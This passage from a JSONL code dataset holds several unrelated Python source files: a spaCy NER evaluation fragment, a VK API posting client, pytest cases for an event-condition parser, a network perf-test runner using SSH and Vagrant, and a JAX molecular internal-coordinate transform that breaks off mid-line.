e in doc.ents]\n \n return entities\n\n#####\n# Confusion Matrix\n#####\nfrom sklearn.metrics import confusion_matrix\n\ndef generate_confusion_matrix(docs): \n classes = sorted(set(create_total_target_vector(docs)))\n y_true = create_total_target_vector(docs)\n predictions = create_total_prediction_vector(docs)\n\n y_pred = [pred[2] for pred in predictions]\n\n return confusion_matrix(y_true, y_pred)\n\ngenerate_confusion_matrix(validation_data)\n\n#####\n# Calculate Evaluation Metrics\n#####\n\n#Precision\n\n#Recall\n","repo_name":"onthemarq/coffee_app","sub_path":"endpoints/data/pipeline/testing_ner.py","file_name":"testing_ner.py","file_ext":"py","file_size_in_byte":2751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3188135177","text":"from typing import IO, List, Union\n\nimport requests\n\nfrom api.models import PlatformPost\nfrom custom_types import JSON\n\n\ndef get_authorization_url(client_id: int, api_version: float) -> str:\n \"\"\"\n Returns a string with url for authorization.\n\n By following the url, you will be asked by VK to give access to the application.\n After agreement, a blank page will be displayed, and there will be an access token\n in the address bar. This token is required by functions bellow.\n \"\"\"\n url = (\n 'https://oauth.vk.com/authorize?client_id={client_id}&response_type=token&' +\n 'scope=wall,offline,groups,photos,docs&v={api_version}&' +\n 'redirect_uri=https://oauth.vk.com/blank.html'\n ).format(\n client_id=client_id, api_version=api_version,\n )\n return url\n\n\ndef send_post_to_group(\n token: str, group_id: int, api_version: float, post: PlatformPost,\n) -> JSON:\n \"\"\"\n Sends post to vk group on behalf of the group itself.\n \"\"\"\n vk_api = VkAPI(token, api_version)\n attachments: List[str] = []\n # TODO: Add attachments uploading according to PlatformPost changes\n return vk_api.send_post_to_group_wall(group_id, post.text_for_posting, attachments)\n\n\nclass VkAPIError(Exception):\n \"\"\"\n Vk API base exception.\n \"\"\"\n\n def __init__(self, method: str, payload: JSON, response: bytes):\n \"\"\"\n Init error.\n \"\"\"\n message = '{0} {1} {2}'.format(method, payload, response)\n super().__init__(message)\n\n\nclass VkAPI(object):\n \"\"\"\n Local mini client for vk API.\n\n Its purpose is to share token, api version, and error handling among the api methods.\n \"\"\"\n\n def __init__(self, token: str, api_version: float):\n \"\"\"\n Init client.\n \"\"\"\n self._token = token\n self._api_version = api_version\n self._url = 'https://api.vk.com/method/'\n\n def send_post_to_group_wall(\n self,\n group_id: int,\n message: str,\n attachments: Union[List[str], None] = None,\n ) -> JSON:\n \"\"\"\n Sends post to vk group on behalf of the group itself.\n \"\"\"\n payload = {\n 'owner_id': -group_id,\n 'from_group': 1,\n 'message': message,\n }\n if attachments:\n payload['attachment'] = ','.join(attachments)\n return self._request(\n 'wall.post',\n payload=payload,\n )\n\n def upload_doc(self, doc: IO[bytes]) -> str:\n \"\"\"\n Uploads and saves doc on the server.\n \"\"\"\n upload_url = self._request('docs.getWallUploadServer')['upload_url']\n\n uploaded_doc = self._upload_media(upload_url, doc)\n\n saved_doc = self._request(\n 'docs.save',\n {'file': uploaded_doc['file']},\n )['doc']\n return 'doc{0}_{1}'.format(saved_doc['owner_id'], saved_doc['id'])\n\n def upload_photo(self, group_id: int, photo: IO[bytes]) -> str:\n \"\"\"\n Uploads and saves photo in the community wall photos.\n \"\"\"\n upload_url = self._request(\n 'photos.getWallUploadServer',\n {'group_id': group_id},\n )['upload_url']\n\n uploaded_photo = self._upload_media(upload_url, photo)\n\n saved_photo = self._request(\n 'photos.saveWallPhoto', {\n 'group_id': group_id,\n 'server': uploaded_photo['server'],\n 'hash': uploaded_photo['hash'],\n 'photo': uploaded_photo['photo'],\n },\n )[0]\n return 'photo{0}_{1}'.format(saved_photo['owner_id'], saved_photo['id'])\n\n def _request(self, method: str, payload: JSON = None) -> JSON:\n \"\"\"\n Sends request to the VK API method with the given payload.\n \"\"\"\n if payload is None:\n payload = {}\n payload.update({\n 'v': self._api_version,\n 'access_token': self._token,\n })\n response = requests.post(self._url + method, data=payload)\n if response.status_code != requests.codes.ok or 'error' in response.json():\n raise VkAPIError(method, payload, response.content)\n return response.json()['response']\n\n def _upload_media(self, upload_url: str, media: IO[bytes]) -> JSON:\n \"\"\"\n Upload media to the VK server.\n \"\"\"\n response = requests.post(upload_url, files={'file': media})\n if response.status_code != requests.codes.ok or 'error' in response.json():\n raise VkAPIError(upload_url, {'file': media.name}, response.content)\n return response.json()\n","repo_name":"piterpy-meetup/postpost","sub_path":"postpost/gates/vkontakte.py","file_name":"vkontakte.py","file_ext":"py","file_size_in_byte":4604,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"37"} +{"seq_id":"13896825959","text":"import datetime\n\nfrom freezegun import freeze_time\nimport pytest\n\nfrom zconnect.util.event_condition_parser import Condition\n\nfreezer_ts = 1400000000\nfreezer_time = datetime.datetime.utcfromtimestamp(freezer_ts)\nfreezer_string = freezer_time.isoformat()\n\nlong_before = freezer_ts - 100000\nbefore = freezer_ts - 1000\nafter = freezer_ts + 1000\n\nseconds_before = freezer_ts - 30 # 30 seconds before\nmins_before = freezer_ts - 120 # 2 mins before\nhours_before = freezer_ts - 7200 # 2 hours before\ndays_before = freezer_ts - 172800 # 2 days before\nweeks_before = freezer_ts - 1209600 # 2 weeks before\nmonths_before = freezer_ts - 5184000 # 60 days before\nyears_before = freezer_ts - 51840000 # 600 days before\n\ndef time_since_midnight(input):\n return (input - input.replace(hour=0, minute=0, second=0, microsecond=0))\n\n# Conditions needed for test cases\nconditions = [\n Condition(\"temp==10\"), #0\n Condition(\"temp>=10\"), #1\n Condition(\"temp<25\"), #2\n Condition(\"temp<25 && temp>=10\"), #3\n Condition(\"(temp != 10) && (temp<=25)\"), #4\n Condition(\"(temp<10) || (temp>25)\"), #5\n Condition(\"hum>70\"), #6\n Condition(\"pir:motion==true\"), #7\n Condition(\"day==1\"), #8\n Condition(\"day==1 && time==300\"), #9\n Condition(\"time=={}\".format(time_since_midnight(freezer_time).total_seconds())), # 10\n Condition(\"nested_state:away==true\"), #11\n Condition(\"period==minutely\"), # 12\n Condition(\"period==hourly\"), # 13\n Condition(\"period==daily\"), # 14\n Condition(\"period==weekly\"), # 15\n Condition(\"period==monthly\"), # 16\n Condition(\"period==yearly\"), # 17\n Condition(\"pir:motion==true && temp>=10\"), #18\n Condition(\"nested_state:schedule_on==true&&nested_state:away==false\"), #19\n Condition(\"non_existant:field==true\"), #20\n Condition(\"fvalue==false\"), #21\n Condition(\"\") #22\n]\n\n@pytest.mark.parametrize(\"condition, context, expected\", [\n (conditions[0], {\"temp\": 10}, True),\n (conditions[0], {\"temp\": -10}, False),\n (conditions[0], {\"temp\": 20}, False),\n (conditions[1], {\"temp\": 30}, True),\n (conditions[1], {\"temp\": 9}, False),\n (conditions[1], {\"temp\": 10}, True),\n (conditions[2], {\"temp\": 30}, False),\n (conditions[2], {\"temp\": 25}, False),\n (conditions[2], {\"temp\": 9}, True),\n (conditions[3], {\"temp\": 30}, False),\n (conditions[3], {\"temp\": 15}, True),\n (conditions[3], {\"temp\": 9}, False),\n (conditions[4], {\"temp\": 10}, False),\n (conditions[4], {\"temp\": 11}, True),\n (conditions[4], {\"temp\": 26}, False),\n (conditions[5], {\"temp\": 26}, True),\n (conditions[5], {\"temp\": 9}, True),\n (conditions[5], {\"temp\": 10}, False),\n (conditions[5], {\"temp\": 25}, False),\n (conditions[6], {\"hum\": 60}, False),\n (conditions[6], {\"hum\": 75, \"temp\": 12}, True),\n (conditions[7], {\"pir\": {\"motion\": True}}, True),\n (conditions[7], {\"pir\": {\"motion\": False}}, False),\n (conditions[18], {\"pir\": {\"motion\": True}, \"temp\": 25}, True),\n (conditions[18], {\"pir\": {\"motion\": True}, \"temp\": 5}, False),\n (conditions[18], {\"pir\": {\"motion\": False}, \"temp\": 25}, False),\n (conditions[19], {\"nested_state\": {\"schedule_on\": True, \"away\": False}}, True),\n (conditions[19], {\"nested_state\": {\"schedule_on\": False, \"away\": False}}, False),\n (conditions[19], {\"nested_state\": {\"schedule_on\": True, \"away\": True}}, False),\n (conditions[20], {}, False),\n (conditions[21], {\"fvalue\": False}, True),\n (conditions[22], {}, False)\n])\ndef test_condition_parser(condition, context, expected):\n assert condition.evaluate(context=context, last_eval_time=100) == expected\n\n@pytest.mark.parametrize(\"test_name, condition, last_eval_time, context, expected\", [\n (\"1\", conditions[8], 100, {\"day\": 0}, True), # Monday\n (\"2\", conditions[8], 100, {\"day\": 0}, True), # Monday\n (\"3\", conditions[0], 100, {\"day\": 0}, False), # Monday\n (\"4\", conditions[8], 100, {\"day\": 0, \"temp\": 100}, True), # Monday\n (\"5\", conditions[8], long_before, {\"temp\": 100}, True), # Monday\n (\"6\", conditions[9], long_before, {\"temp\": 100}, True), # Monday\n (\"7\", conditions[10], long_before, {\"temp\": 100}, True), # Monday\n (\"8\", conditions[11], 100, {\"nested_state\": {\"away\": True}}, True),\n (\"9\", conditions[11], 100, {\"nested_state\": {\"away\": False}}, False),\n (\"10\", conditions[10], freezer_ts, {}, False), # Last evaluated now - shouldn't test again\n (\"11\", conditions[10], after, {}, False), # Last evaluated in the future\n (\"12\", conditions[10], before, {}, True),\n (\"13\", conditions[12], seconds_before, {}, False),\n (\"14\", conditions[12], mins_before, {}, True),\n (\"15\", conditions[13], mins_before, {}, False),\n (\"16\", conditions[13], hours_before, {}, True),\n (\"17\", conditions[14], hours_before, {}, False),\n (\"18\", conditions[14], days_before, {}, True),\n (\"19\", conditions[15], days_before, {}, False),\n (\"20\", conditions[15], weeks_before, {}, True),\n (\"21\", conditions[16], weeks_before, {}, False),\n (\"22\", conditions[16], months_before, {}, True),\n (\"23\", conditions[17], months_before, {}, False),\n (\"24\", conditions[17], years_before, {}, True),\n])\n\n@freeze_time(freezer_string)\ndef test_condition_day_parser(test_name, condition, last_eval_time, context, expected):\n print(\"Test: {}\".format(test_name))\n assert condition.evaluate(context=context, last_eval_time=last_eval_time) == expected\n","repo_name":"zconnect-iot/zconnect-django","sub_path":"tests/utils/test_event_condition_parser.py","file_name":"test_event_condition_parser.py","file_ext":"py","file_size_in_byte":5371,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"41474770581","text":"import argparse\nimport logging\nimport io\nimport os\nimport subprocess\n\nfrom paramiko import SSHConfig\n\nfrom logger import TestingLogger\nfrom perf.state import NetworkState, NetworkStateConfig, ConnectionConfig\nfrom perf.setups.local_auth import LocalAuthSetup\nfrom perf.setups.home_auth import HomeAuthSetup\nfrom perf.setups.backup_auth import BackupAuthSetup\nimport yaml\n\n\ndef main():\n\n parser = argparse.ArgumentParser(description=\"Run the specified perf tests\")\n\n parser.add_argument(\n \"-p\",\n \"--network-config\",\n required=True,\n type=str,\n help=\"Path to config for the network, i.e. hostnames\",\n )\n\n parser.add_argument(\n \"-d\",\n \"--vagrant-dir\",\n required=False,\n type=str,\n help=\"Optional vagrantfile directory\",\n )\n\n parser.add_argument(\n \"-c\",\n \"--config-dir\",\n required=True,\n type=str,\n help=\"Config directory for perf device/service configs\",\n )\n\n parser.add_argument(\n \"-u\",\n \"--ue-driver\",\n required=True,\n type=str,\n help=\"UE driver file path\",\n )\n\n parser.add_argument(\n \"-n\",\n \"--num-ues\",\n required=True,\n type=int,\n help=\"Number of UEs\",\n )\n\n parser.add_argument(\n \"-i\",\n \"--interval\",\n required=True,\n type=int,\n help=\"Interval in milliseconds to connect and reconnect\",\n )\n\n parser.add_argument(\n \"-t\",\n \"--iterations\",\n required=True,\n type=int,\n help=\"Number of times to reconnect\",\n )\n\n parser.add_argument(\n \"-k\",\n \"--key-threshold\",\n required=False,\n type=int,\n help=\"Set key threshold for backup auth\",\n )\n\n parser.add_argument(\n \"--debug\",\n action=\"store_true\",\n help=\"Change logging level to debug\",\n )\n\n # select one of the following setups\n group = parser.add_mutually_exclusive_group(required=True)\n group.add_argument(\n \"--local-auth\",\n action=\"store_true\",\n help=\"Configure the network for local auth\",\n )\n group.add_argument(\n \"--home-auth\",\n action=\"store_true\",\n help=\"Configure the network for home auth\",\n )\n group.add_argument(\n \"--backup-auth\",\n action=\"store_true\",\n help=\"Configure the network for backup auth\",\n )\n\n args = parser.parse_args()\n\n # if args.num_ues <= 10:\n # # Increase the number of samples but at the same steady-state rate\n # args.num_ues = args.num_ues * 100\n # args.interval = args.interval * 100\n # elif args.num_ues < 100:\n # # Increase the number of samples but at the same steady-state rate\n # args.num_ues = args.num_ues * 10\n # args.interval = args.interval * 10\n\n if args.debug:\n TestingLogger.logger.setLevel(logging.DEBUG)\n else:\n TestingLogger.logger.setLevel(logging.INFO)\n\n TestingLogger.logger.info(\"Building state and connecting...\")\n config = NetworkStateConfig(args.config_dir, args.ue_driver)\n\n build_config(\n config, yaml.safe_load(open(args.network_config, \"r\")), args.vagrant_dir\n )\n\n state = NetworkState(config)\n\n if args.local_auth:\n setup = LocalAuthSetup(state)\n elif args.home_auth:\n setup = HomeAuthSetup(state)\n elif args.backup_auth:\n setup = BackupAuthSetup(state)\n else:\n raise Exception(\"No setup specified\")\n\n if args.key_threshold:\n setup.key_threshold = args.key_threshold\n\n setup.run_perf(args.num_ues, args.interval, args.iterations)\n\n\ndef build_config(config: NetworkStateConfig, network: dict, vagrant_dir: str) -> None:\n vagrant_config = None\n if vagrant_dir:\n vagrant_config = SSHConfig()\n vagrant_config.parse(\n io.StringIO(\n subprocess.check_output(\n [\"vagrant\", \"ssh-config\"], cwd=vagrant_dir\n ).decode()\n )\n )\n\n config.directory_config = handle_connection(network[\"directory\"], vagrant_config)\n config.ueransim_config = handle_connection(network[\"ueransim\"], vagrant_config)\n for service in network[\"services\"]:\n config.service_configs.append(handle_connection(service, vagrant_config))\n\n\ndef handle_connection(\n connection_info: dict, vagrant_config: SSHConfig\n) -> ConnectionConfig:\n if connection_info[\"is_vagrant\"]:\n if not vagrant_config:\n raise Exception(\"No vagrant dir specified\")\n\n ssh_info = vagrant_config.lookup(connection_info[\"hostname\"])\n\n conf = ConnectionConfig(\n ssh_info[\"hostname\"],\n connection_info[\"id\"],\n ssh_info[\"user\"],\n int(ssh_info[\"port\"]),\n ssh_info[\"identityfile\"][0],\n )\n\n conf.service_ip = connection_info.get(\"service_ip\")\n conf.directory_addr = connection_info.get(\"directory_addr\")\n return conf\n else:\n return ConnectionConfig(\n connection_info[\"hostname\"],\n connection_info[\"id\"],\n \"ictd\", # TODO: look into this,\n 22,\n os.path.expanduser(\"~/.ssh/id_rsa\"),\n )\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"uw-ictd/dAuth","sub_path":"testing/perf/run_perf.py","file_name":"run_perf.py","file_ext":"py","file_size_in_byte":5241,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"38169887791","text":"from jax import numpy as jnp\nimport numpy as np\n\nfrom . import numerical\nfrom . import graph\n\n\nclass InternalCoordinateTransform:\n def __init__(self, dims, z_indices=None, cart_indices=None, data=None,\n ind_circ_dih=[], shift_dih=False,\n shift_dih_params={'hist_bins': 100},\n default_std={'bond': 0.005, 'angle': 0.15, 'dih': 0.2}):\n self.dims = dims\n # Setup indexing.\n self._setup_indices(z_indices, cart_indices)\n self._validate_data(data)\n # Setup the mean and standard deviations for each internal coordinate.\n transformed, _ = self._fwd(data)\n # Normalize\n self.default_std = default_std\n self.ind_circ_dih = ind_circ_dih\n self._setup_mean_bonds(transformed)\n transformed = transformed.at[..., self.bond_indices].set(transformed[..., self.bond_indices] - self.mean_bonds)\n self._setup_std_bonds(transformed)\n transformed = transformed.at[..., self.bond_indices].set(transformed[..., self.bond_indices] / self.std_bonds)\n self._setup_mean_angles(transformed)\n transformed = transformed.at[..., self.angle_indices].set(transformed[..., self.angle_indices] - self.mean_angles)\n self._setup_std_angles(transformed)\n transformed = transformed.at[..., self.angle_indices].set(transformed[..., self.angle_indices] / self.std_angles)\n self._setup_mean_dih(transformed)\n transformed = transformed.at[..., self.dih_indices].set(transformed[..., self.dih_indices] - self.mean_dih)\n transformed = self._fix_dih(transformed)\n self._setup_std_dih(transformed)\n transformed = transformed.at[..., self.dih_indices].set(transformed[..., self.dih_indices] / self.std_dih)\n if shift_dih:\n val = jnp.linspace(-np.pi, np.pi,\n shift_dih_params['hist_bins'])\n for i in self.ind_circ_dih:\n dih = transformed[:, self.dih_indices[i]]\n dih = dih * self.std_dih[i] + self.mean_dih[i]\n dih = (dih + np.pi) % (2 * np.pi) - np.pi\n hist, _ = jnp.histogram(dih, bins=shift_dih_params['hist_bins'],\n range=[-np.pi, np.pi])\n self.mean_dih[i] = val[jnp.argmin(hist)] + np.pi\n dih = (dih - self.mean_dih[i]) / self.std_dih[i]\n dih = (dih + np.pi) % (2 * np.pi) - np.pi\n transformed[:, self.dih_indices[i]] = dih\n scale_jac = -(\n jnp.sum(jnp.log(self.std_bonds))\n + jnp.sum(jnp.log(self.std_angles))\n + jnp.sum(jnp.log(self.std_dih))\n )\n self.scale_jac = scale_jac\n\n def forward(self, x, context=None):\n trans, jac = self._fwd(x)\n trans = trans.at[..., self.bond_indices].set((trans[..., self.bond_indices] - self.mean_bonds) / self.std_bonds)\n trans = trans.at[..., self.angle_indices].set((trans[..., self.angle_indices] - self.mean_angles) / self.std_angles)\n trans = trans.at[..., self.dih_indices].set(trans[..., self.dih_indices] - self.mean_dih)\n trans = self._fix_dih(trans)\n trans = trans.at[..., self.dih_indices].set(trans[..., self.dih_indices] / self.std_dih)\n return trans, jac + self.scale_jac\n\n def _fwd(self, x):\n # we can do everything in parallel...\n inds1 = self.inds_for_atom[self.rev_z_indices[:, 1]]\n inds2 = self.inds_for_atom[self.rev_z_indices[:, 2]]\n inds3 = self.inds_for_atom[self.rev_z_indices[:, 3]]\n inds4 = self.inds_for_atom[self.rev_z_indices[:, 0]]\n\n # Calculate the bonds, angles, and torions for a batch.\n bonds = numerical.calc_bonds(inds1, inds4, coords=x)\n angles = numerical.calc_angles(inds2, inds1, inds4, coords=x)\n dihedrals = numerical.calc_dihedrals(inds3, inds2, inds1, inds4, coords=x)\n\n jac = -jnp.sum(\n 2 * jnp.log(bonds) + jnp.log(jnp.abs(jnp.sin(angles))), axis=-1\n )\n\n # Replace the cartesian coordinates with internal coordinates.\n x = x.at[..., inds4[:, 0]].set(bonds)\n x = x.at[..., inds4[:, 1]].set(angles)\n x = x.at[..., inds4[:, 2]].set(dihedrals)\n return x, jac\n\n def inverse(self, x, context=None):\n # Gather all of the atoms represented as cartesisan coordinates.\n cart_shape = (-1, 3)\n if x.ndim == 2:\n cart_shape = (x.shape[0],) + cart_shape\n cart = x[..., self.init_cart_indices].reshape(*cart_shape)\n\n # Setup the log abs det jacobian\n jac = jnp.zeros(x.shape[:-1])\n\n # Loop over all of the blocks, where all of the atoms in each block\n # can be built in parallel because they only depend on atoms that\n # are already cartesian. `atoms_to_build` lists the `n` atoms\n # that can be built as a batch, where the indexing refers to the\n # original atom order. `ref_atoms` has size n x 3, where the indexing\n # refers to the position in `cart`, rather than the original order.\n for block in self.rev_blocks:\n atoms_to_build = block[:, 0]\n ref_atoms = block[:, 1:]\n\n # Get all of the bonds by retrieving the appropriate columns and\n # un-normalizing.\n bonds = (\n x[..., 3 * atoms_to_build]\n * self.std_bonds[self.atom_to_stats[atoms_to_build]]\n + self.mean_bonds[self.atom_to_stats[atoms_to_build]]\n )\n\n # Get all of the angles by retrieving the appropriate columns and\n # un-normalizing.\n angles = (\n x[..., 3 * atoms_to_build + 1]\n * self.std_angles[self.atom_to_stats[atoms_to_build]]\n + self.mean_angles[self.atom_to_stats[atoms_to_build]]\n )\n # Get all of the dihedrals by retrieving the appropriate columns and\n # un-normalizing.\n dihs = (\n x[..., 3 * atoms_to_build + 2]\n * self.std_dih[self.atom_to_stats[atoms_to_build]]\n + self.mean_dih[self.atom_to_stats[atoms_to_build]]\n )\n\n # Fix the dihedrals to lie in [-pi, pi].\n dihs = jnp.where(dihs < np.pi, dihs + 2 * np.pi, dihs)\n dihs = jnp.where(dihs > np.pi, dihs - 2 * np.pi, dihs)\n\n # Compute the cartesian coordinates for the newly placed atoms.\n new_cart, cart_jac = numerical.reconstruct_cart(cart, ref_atoms, bonds, angles, dihs)\n jac = jac + cart_jac\n\n # Concatenate the cartesian coordinates for the newly placed\n # atoms onto the full set of cartesian coordiantes.\n cart = jnp.concatenate([cart, new_cart], axis=-2)\n # Permute cart back into the original order and flatten.\n cart = cart[..., self.rev_perm_inv, :]\n cart = cart.reshape(*cart_shape[:-1])\n return cart, jac - self.scale_jac\n\n def _setup_mean_bonds(self, x):\n self.mean_bonds = jnp.mean(x[:, self.bond_indices], axis=0)\n\n def _setup_std_bonds(self, x):\n # Adding 1e-4 might help for numerical stability but results in some\n # dimensions being not properly normalised e.g. bond lengths\n # which can have stds of the order 1e-7\n # The flow will then have to fit to a very concentrated dist\n if x.shape[0] > 1:\n self.std_bonds = jnp.std(x[:, self.bond_indices], axis=0)\n else:\n self.std_bonds = jnp.ones_like(self.mean_bonds) \\\n * self.default_std['bond']\n\n def _setup_mean_angles(self, x):\n self.mean_angles = jnp.mean(x[:, self.angle_indices], axis=0)\n\n def _setup_std_angles(self, x):\n if x.shape[0] > 1:\n self.std_angles = jnp.std(x[:, self.angle_indices], axis=0)\n else:\n self.std_angles = jnp.ones_like(self.mean_angles) \\\n * self.default_std['angle']\n\n def _setup_mean_dih(self, x):\n sin = jnp.mean(jnp.sin(x[:, self.dih_indices]), axis=0)\n cos = jnp.mean(jnp.cos(x[:, self.dih_indices]), axis=0)\n self.mean_dih = jnp.arctan2(sin, cos)\n\n def _fix_dih(self, x):\n dih = x[..., self.dih_indices]\n dih = (dih + np.pi) % (2 * np.pi) - np.pi\n return x.at[..., self.dih_indices].set(dih)\n\n def _setup_std_dih(self, x):\n if x.shape[0] > 1:\n self.std_dih = jnp.std(x[:, self.dih_indices], axis=0)\n else:\n std_dih = jnp.ones_like(self.mean_dih) \\\n * self.default_std['dih']\n self.std_dih = std_dih.at[self.ind_circ_dih].set(1.)\n\n def _validate_data(self, data):\n if data is None:\n raise ValueError(\n \"InternalCoordinateTransform must be supplied with training_data.\"\n )\n\n if len(data.shape) != 2:\n raise ValueError(\"training_data must be n_samples x n_dim array\")\n\n n_dim = data.shape[1]\n\n if n_dim != self.dims:\n raise ValueError(\n f\"training_data must have {self.dims} dimensions, not {n_dim}.\"\n )\n\n def _setup_indices(self, z_indices, cart_indices):\n n_atoms = self.dims // 3\n self.inds_for_atom = jnp.arange(n_atoms * 3).reshape(n_atoms, 3)\n\n sorted_z_indices = graph.topological_sort(z_indices)\n sorted_z_indices = [\n [item[0], item[1][0], item[1][1], item[1][2]] for item in sorted_z_indices\n ]\n rev_z_indices = list(reversed(sorted_z_indices))\n\n mod = [item[0] for item in sorted_z_indices]\n modified_indices = []\n for index in mod:\n modified_indices.extend(self.inds_for_atom[index])\n bond_indices = list(modified_indices[0::3])\n angle_indices = list(modified_indices[1::3])\n dih_indices = list(modified_indices[2::3])\n\n self.modified_indices = jnp.array(modified_indices, dtype=int)\n self.bond_indices = jnp.array(bond_indices, dtype=int)\n self.angle_indices = jnp.array(angle_indices, dtype=int)\n self.dih_indices = jnp.array(dih_indices, dtype=int)\n self.sorted_z_indices = jnp.array(sorted_z_indices, dtype=int)\n self.rev_z_indices = jnp.array(rev_z_indices, dtype=int)\n\n #\n # Setup indexing for reverse pass.\n #\n # First, create an array that maps from an atom index into mean_bonds, std_bonds, etc.\n atom_to_stats = jnp.zeros(n_atoms, dtype=int)\n for i, j in enumerate(mod):\n atom_to_stats = atom_to_stats.at[j].set(i)\n self.atom_to_stats = atom_to_stats\n\n # Next create permutation vector that is used in the reverse pass. This maps\n # from the original atom indexing to the order that the cartesian coordinates\n # will be built in. This will be filled in as we go.\n rev_perm = jnp.zeros(n_atoms, dtype=int)\n # Next create the inverse of rev_perm. This will be filled in as we go.\n rev_perm_inv = jnp.zeros(n_atoms, dtype=int)\n\n # Create the list of columns that form our initial cartesian coordintes.\n init_cart_indices = self.inds_for_atom[jnp.array(cart_indices)].reshape(-1)\n self.init_cart_indices = init_cart_indices\n\n # Update our permutation vectors for the initial cartesian atoms.\n for i, j in enumerate(cart_indices):\n rev_perm = rev_perm.at[i].set(j)\n rev_perm_inv = rev_perm_inv.at[j].set(i)\n\n # Break Z into blocks, where all of the atoms within a block can be built\n # in parallel, because they only depend on already-cartesian atoms.\n all_cart = set(cart_indices)\n current_cart_ind = i + 1\n blocks = []\n while sorted_z_indices:\n next_z_indices = []\n next_cart = set()\n block = []\n for atom1, atom2, atom3, atom4 in sorted_z_indices:\n if (atom2 in all_cart) and (atom3 in all_cart) and (atom4 in all_cart):\n # We can build this atom from existing cartesian atoms, so we add\n # it to the list of cartesian atoms available for the next block.\n next_cart.add(atom1)\n\n # Add this atom to our permutation marices.\n rev_perm = rev_perm.at[current_cart_ind].set(atom1)\n rev_perm_inv = rev_perm_inv.at[atom1].set(current_cart_ind)\n current_cart_ind += 1\n\n # Next, we convert the indices for atoms2-4 from their normal values\n # to the appropriate indices to index into the cartesian array.\n atom2_mod = rev_perm_inv[atom2]\n atom3_mod = rev_perm_inv[atom3]\n atom4_mod = rev_perm_inv[atom4]\n\n # Finally, we append this information to the current block.\n\n block.append([atom1, atom2_mod, atom3_mod, atom4_mod])\n else:\n # We can't build this atom from existing cartesian atoms,\n # so put it on the list for next time.\n next_z_indices.append([atom1, atom2, atom3, atom4])\n sorted_z_indices = next_z_indices\n all_cart = all_cart.union(next_cart)\n block = jnp.array(block, dtype=int)\n blocks.append(block)\n self.rev_perm = rev_perm\n self.rev_perm_inv = rev_perm_inv\n self.rev_blocks = blocks\n\n def _periodic_angle_loss(self, angles):\n \"\"\"\n Penalizes angles outside the range [-pi, pi]\n\n Prevents violating invertibility in internal coordinate transforms.\n Computes\n\n L = (a-pi) ** 2 for a > pi\n L = (a+pi) ** 2 for a < -pi\n\n and returns the sum over all angles per batch.\n \"\"\"\n positive_loss = jnp.sum(jnp.where(angles > np.pi, angles - np.pi, 0) ** 2, axis=-1)\n negative_loss = jnp.sum(jnp.where(angles < -np.pi, angles + np.pi, 0) ** 2, axis=-1)\n return positive_loss + negative_loss\n\n\n\nclass CompleteInternalCoordinateTransform:\n def __init__(\n self,\n n_dim,\n z_mat,\n cartesian_indices,\n data,\n ind_circ_dih=[],\n shift_dih=False,\n shift_dih_params={'hist_bins': 100},\n default_std={'bond': 0.005, 'angle': 0.15, 'dih': 0.2}\n ):\n super().__init__()\n # cartesian indices are the atom indices of the atoms that are not\n # represented in internal coordinates but are left as cartesian\n # e.g. for 22 atoms it could be [4, 5, 6, 8, 14, 15, 16, 18]\n self.n_dim = n_dim\n self.len_cart_inds = len(cartesian_indices)\n assert self.len_cart_inds == 3\n\n # Create our internal coordinate transform\n self.ic_transform = InternalCoordinateTransform(\n n_dim, z_mat, cartesian_indices, data, ind_circ_dih,\n shift_dih, shift_dih_params, default_std\n )\n\n # permute puts the cartesian coords first then the internal ones\n # permute_inv does the opposite\n permute = jnp.zeros(n_dim, dtype=int)\n permute_inv = jnp.zeros(n_dim, dtype=int)\n all_ind = cartesian_indices + [row[0] for row in z_mat]\n for i, j in enumerate(all_ind):\n permute = permute.at[3 * i + 0].set(3 * j + 0)\n permute = permute.at[3 * i + 1].set(3 * j + 1)\n permute = permute.at[3 * i + 2].set(3 * j + 2)\n permute_inv = permute_inv.at[3 * j + 0].set(3 * i + 0)\n permute_inv = permute_inv.at[3 * j + 1].set(3 * i + 1)\n permute_inv = permute_inv.at[3 * j + 2].set(3 * i + 2)\n self.permute = permute\n self.permute_inv = permute_inv\n\n data = data[:, self.permute]\n b1, b2, angle = self._convert_last_internal(data[:, :3 * self.len_cart_inds])\n self.mean_b1 = jnp.mean(b1)\n self.mean_b2 = jnp.mean(b2)\n self.mean_angle = jnp.mean(angle)\n if b1.shape[0] > 1:\n self.std_b1 = jnp.std(b1)\n self.std_b2 = jnp.std(b2)\n self.std_angle = jnp.std(angle)\n else:\n self.std_b1 = jnp.array(default_std['bond'])\n self.std_b2 = jnp.array(default_std['bond'])\n self.std_angle = jnp.array(default_std['angle'])\n self.scale_jac = -(jnp.log(self.std_b1) + jnp.log(self.std_b2) + jnp.log(self.std_angle))\n\n\n def forward(self, x):\n jac = jnp.zeros(x.shape[:-1])\n\n # Run transform to internal coordinates.\n x, new_jac = self.ic_transform.forward(x)\n jac = jac + new_jac\n\n # Permute to put PCAs first.\n x = x[..., self.permute]\n\n # Split off the PCA coordinates and internal coordinates\n int_coords = x[..., (3 * self.len_cart_inds):]\n\n # Compute last internal coordinates\n b1, b2, angle = self._convert_last_internal(x[..., :(3 * self.len_cart_inds)])\n jac = jac - jnp.log(b2)\n # Normalize\n b1 -= self.mean_b1\n b1 /= self.std_b1\n b2 -= self.mean_b2\n b2 /= self.std_b2\n angle -= self.mean_angle\n angle /= self.std_angle\n jac = jac + self.scale_jac\n\n # Merge everything back together.\n x = jnp.concatenate([b1[..., None], b2[..., None], angle[..., None], int_coords], axis=-1)\n\n return x, jac\n\n def inverse(self, x):\n # Create the jacobian vector\n jac = jnp.zeros(x.shape[:-1])\n\n # Separate the internal coordinates\n b1, b2, angle = x[..., 0], x[..., 1], x[..., 2]\n int_coords = x[..., (3 * self.len_cart_inds - 6):]\n\n # Reconstruct first three atoms\n b1 = b1 * self.std_b1 + self.mean_b1\n b2 = b2 * self.std_b2 + self.mean_b2\n angle = angle * self.std_angle + self.mean_angle\n jac = jac - self.scale_jac\n cart_coords = jnp.zeros(x.shape[:-1] + (3 * self.len_cart_inds,))\n cart_coords = cart_coords.at[..., 3].set(b1)\n cart_coords = cart_coords.at[..., 6].set(b2 * jnp.cos(angle))\n cart_coords = cart_coords.at[..., 7].set(b2 * 